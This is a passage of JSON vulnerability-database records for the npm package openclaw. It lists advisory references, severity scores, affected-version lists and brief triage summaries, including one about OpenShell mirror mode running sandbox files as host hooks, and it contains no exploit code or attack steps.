                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/c5415a474bb085404c20f8b312e436997977b1ea"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rf6h-5gpw-qrgq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rf6h-5gpw-qrgq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35654",
                    "reference_id": "CVE-2026-35654",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35654"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rf6h-5gpw-qrgq",
                    "reference_id": "GHSA-rf6h-5gpw-qrgq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rf6h-5gpw-qrgq"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke",
                    "reference_id": "openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-35654",
                "GHSA-rf6h-5gpw-qrgq"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-vm8g-hrvu-quhm"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/88996?format=api",
            "vulnerability_id": "VCID-vqrj-z6tx-rff2",
            "summary": "OpenClaw: OpenShell `mirror` mode can convert untrusted sandbox files into explicitly enabled workspace hooks and execute them on the host during gateway startup\n## Summary\nOpenShell `mirror` mode can convert untrusted sandbox files into explicitly enabled workspace hooks and execute them on the host during gateway startup\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real on shipped <=2026.3.22 OpenShell mirror sync, but exploitation needs mirror mode, hooks enabled, an explicit hook opt-in and a restart, so a high severity rating is overstated, even though the direct fix shipped in v2026.3.28.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41355",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02672",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02725",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0272",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41355"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-42mx-vp8m-j7qh",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-42mx-vp8m-j7qh"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41355",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41355"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openshell-arbitrary-code-execution-via-mirror-mode-sandbox-file-conversion",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openshell-arbitrary-code-execution-via-mirror-mode-sandbox-file-conversion"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-42mx-vp8m-j7qh",
                    "reference_id": "GHSA-42mx-vp8m-j7qh",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-42mx-vp8m-j7qh"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
